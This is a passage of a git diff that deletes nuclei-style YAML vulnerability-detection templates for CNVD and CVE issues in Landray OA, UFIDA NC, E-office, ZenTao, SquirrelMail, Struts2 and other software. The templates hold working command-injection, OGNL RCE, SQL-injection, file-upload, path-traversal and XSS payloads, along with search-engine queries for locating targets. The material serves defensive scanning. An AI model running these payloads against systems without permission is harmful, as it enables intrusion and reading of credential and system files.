- https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: eyoumail,rce,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
type='|cat /etc/passwd||'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,51 +0,0 @@
|
|||
id: CNVD-2021-28277
|
||||
|
||||
info:
|
||||
name: Landray-OA - Local File Inclusion
|
||||
author: pikpikcu,daffainfo
|
||||
severity: high
|
||||
description: Landray-OA is susceptible to local file inclusion.
|
||||
reference:
|
||||
- https://www.aisoutu.com/a/1432457
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
||||
metadata:
|
||||
fofa-query: app="Landray OA system"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
tags: landray,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
var={"body":{"file":"file:///etc/passwd"}}
|
||||
|
||||
- |
|
||||
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
var={"body":{"file":"file:///c://windows/win.ini"}}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "for 16-bit app support"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,50 +0,0 @@
|
|||
id: CNVD-2021-30167
|
||||
|
||||
info:
|
||||
name: UFIDA NC BeanShell Remote Command Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
|
||||
reference:
|
||||
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
||||
- https://www.cnvd.org.cn/webinfo/show/6491
|
||||
- https://chowdera.com/2022/03/202203110138271510.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: cnvd,cnvd2021,beanshell,rce,yonyou
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- | #linux
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("id");
|
||||
|
||||
- | #windows
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("ipconfig");
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid="
|
||||
- "Windows IP"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "BeanShell Test Servlet"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/07/05
|
|
@ -1,48 +0,0 @@
|
|||
id: CNVD-2021-49104
|
||||
|
||||
info:
|
||||
name: Pan Micro E-office File Uploads
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
|
||||
reference:
|
||||
- https://chowdera.com/2021/12/202112200602130067.html
|
||||
- http://v10.e-office.cn
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
|
||||
cvss-score: 9.9
|
||||
cwe-id: CWE-434
|
||||
remediation: Pan Wei has released an update to resolve this vulnerability.
|
||||
tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4
|
||||
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
<?php echo md5('CNVD-2021-49104');?>
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4--
|
||||
|
||||
- |
|
||||
GET /images/logo/logo-eoffice.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "94d01a2324ce38a2e29a629c54190f67"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/02/28
|
|
@ -1,49 +0,0 @@
|
|||
id: CNVD-2022-03672
|
||||
|
||||
info:
|
||||
name: Sunflower Simple and Personal - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
|
||||
reference:
|
||||
- https://www.1024sou.com/article/741374.html
|
||||
- https://copyfuture.com/blogs-details/202202192249158884
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: cnvd,cnvd2020,sunflower,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/rpc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
action=verify-haras
|
||||
- |
|
||||
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: CID={{cid}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: cid
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '"verify_string":"(.*)"'
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1==200"
|
||||
- "status_code_2==200"
|
||||
- "contains(body_1, 'verify_string')"
|
||||
- "contains(body_2, 'Windows IP')"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,41 +0,0 @@
|
|||
id: CNVD-2022-42853
|
||||
|
||||
info:
|
||||
name: ZenTao CMS - SQL Injection
|
||||
author: ling
|
||||
severity: critical
|
||||
description: |
|
||||
ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"zentao"
|
||||
fofa-query: "Zentao"
|
||||
tags: cnvd,cnvd2022,zentao,sqli
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /zentao/user-login.html HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/zentao/user-login.html
|
||||
|
||||
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'c8c605999f3d8352d7bb792cf3fdb25'
|
||||
|
||||
# Enhanced by mp on 2022/09/28
|
|
@ -1378,6 +1378,16 @@
|
|||
"website": "https://the-empire.systems",
|
||||
"email": ""
|
||||
}
|
||||
},
|
||||
{
|
||||
"author": "mabdullah22",
|
||||
"links": {
|
||||
"github": "https://www.github.com/maabdullah22",
|
||||
"twitter": "https://twitter.com/0x416264",
|
||||
"linkedin": "",
|
||||
"website": "",
|
||||
"email": ""
|
||||
}
|
||||
}
|
||||
|
||||
]
|
||||
|
|
|
@ -0,0 +1 @@
|
|||
b830e8b5ef413ec8d972848bd93b95d8
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2000-0114
|
||||
|
||||
info:
|
||||
name: Microsoft FrontPage Extensions Check (shtml.dll)
|
||||
author: r3naissance
|
||||
severity: low
|
||||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
|
||||
- https://www.exploit-db.com/exploits/19897
|
||||
classification:
|
||||
cve-id: CVE-2000-0114
|
||||
remediation: Upgrade to the latest version.
|
||||
tags: cve,cve2000,frontpage,microsoft,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/_vti_inf.html'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "_vti_bin/shtml.dll"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
|
@ -1,29 +0,0 @@
|
|||
id: CVE-2001-1473
|
||||
|
||||
info:
|
||||
name: Deprecated SSHv1 Protocol Detection
|
||||
author: iamthefrogy
|
||||
severity: high
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cvss-score: 7.4
|
||||
cve-id: CVE-2001-1473
|
||||
cwe-id: CWE-310
|
||||
remediation: Upgrade to SSH 2.4 or later.
|
||||
tags: cve,cve2001,network,ssh,openssh
|
||||
|
||||
network:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Host}}:22"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SSH-1"
|
||||
|
||||
# Enhanced by Chris on 2022/01/21
|
|
@ -1,46 +0,0 @@
|
|||
id: CVE-2002-1131
|
||||
|
||||
info:
|
||||
name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
reference:
|
||||
- http://www.redhat.com/support/errata/RHSA-2002-204.html
|
||||
- http://www.debian.org/security/2002/dsa-191
|
||||
- http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
|
||||
- https://www.exploit-db.com/exploits/21811
|
||||
- https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
|
||||
- http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
|
||||
classification:
|
||||
cve-id: CVE-2002-1131
|
||||
tags: cve2002,edb,xss,squirrelmail,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
|
||||
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
|
||||
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,39 +0,0 @@
|
|||
id: CVE-2004-0519
|
||||
|
||||
info:
|
||||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/24068
|
||||
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
|
||||
- http://security.gentoo.org/glsa/glsa-200405-16.xml
|
||||
- http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857
|
||||
remediation: Upgrade to the latest version.
|
||||
classification:
|
||||
cve-id: CVE-2004-0519
|
||||
tags: squirrelmail,cve2004,cve,edb,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
|
@ -1,35 +0,0 @@
|
|||
id: CVE-2005-2428
|
||||
|
||||
info:
|
||||
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
|
||||
author: CasperGN
|
||||
severity: medium
|
||||
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
|
||||
reference:
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
|
||||
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2005-2428
|
||||
cwe-id: CWE-200
|
||||
tags: domino,edb,cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/names.nsf/People?OpenView"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
name: domino-username
|
||||
regex:
|
||||
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2005-3344
|
||||
|
||||
info:
|
||||
name: Horde Groupware Unauthenticated Admin Access
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
|
||||
- http://www.debian.org/security/2005/dsa-884
|
||||
- http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337
|
||||
classification:
|
||||
cve-id: CVE-2005-3344
|
||||
tags: cve,cve2005,horde,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/horde/admin/user.php"
|
||||
- "{{BaseURL}}/admin/user.php"
|
||||
|
||||
headers:
|
||||
Content-Type: text/html
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Horde :: User Administration</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/18
|
|
@ -1,31 +0,0 @@
|
|||
id: CVE-2005-4385
|
||||
|
||||
info:
|
||||
name: Cofax <=2.0RC3 - Cross-Site Scripting
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
|
||||
reference:
|
||||
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
|
||||
- http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
|
||||
classification:
|
||||
cve-id: CVE-2005-4385
|
||||
tags: cofax,xss,cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'>\"</script><script>alert(document.domain)</script>"
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2006-1681
|
||||
|
||||
info:
|
||||
name: Cherokee HTTPD <=0.5 - Cross-Site Scripting
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
|
||||
reference:
|
||||
- http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/
|
||||
- http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/
|
||||
- http://www.vupen.com/english/advisories/2006/1292
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
|
||||
classification:
|
||||
cve-id: CVE-2006-1681
|
||||
tags: cherokee,httpd,xss,cve,cve2006
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2006-2842
|
||||
|
||||
info:
|
||||
name: Squirrelmail <=1.4.6 - Local File Inclusion
|
||||
author: dhiyaneshDk
|
||||
severity: high
|
||||
description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/27948
|
||||
- http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
|
||||
- http://www.squirrelmail.org/security/issue/2006-06-01
|
||||
- http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-2842
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2006-2842
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2006,lfi,squirrelmail,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2007-0885
|
||||
|
||||
info:
|
||||
name: Jira Rainbow.Zen - Cross-Site Scripting
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference:
|
||||
- http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded
|
||||
- https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2007-0885
|
||||
classification:
|
||||
cve-id: CVE-2007-0885
|
||||
tags: cve,cve2007,jira,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2007-4504
|
||||
|
||||
info:
|
||||
name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/4307
|
||||
- https://www.cvedetails.com/cve/CVE-2007-4504
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2007-4504
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2007-4504
|
||||
cwe-id: CWE-22
|
||||
tags: lfi,edb,cve,cve2007,joomla
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,39 +0,0 @@
|
|||
id: CVE-2007-4556
|
||||
|
||||
info:
|
||||
name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: |
|
||||
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
|
||||
reference:
|
||||
- https://www.guildhab.top/?p=2326
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2007-4556
|
||||
- https://cwiki.apache.org/confluence/display/WW/S2-001
|
||||
- http://forums.opensymphony.com/ann.jspa?annID=54
|
||||
classification:
|
||||
cve-id: CVE-2007-4556
|
||||
tags: cve,cve2007,apache,rce,struts
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/login.action"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/10
|
|
@ -1,41 +0,0 @@
|
|||
id: CVE-2007-5728
|
||||
|
||||
info:
|
||||
name: phpPgAdmin <=4.1.1 - Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/30090
|
||||
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
|
||||
- http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/
|
||||
- http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2007-5728
|
||||
classification:
|
||||
cve-id: CVE-2007-5728
|
||||
metadata:
|
||||
shodan-query: http.title:"phpPgAdmin"
|
||||
tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert("document.domain")</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,39 +0,0 @@
|
|||
id: CVE-2008-1059
|
||||
|
||||
info:
|
||||
name: WordPress Sniplets 1.1.2 - Local File Inclusion
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: |
|
||||
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5194
|
||||
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
|
||||
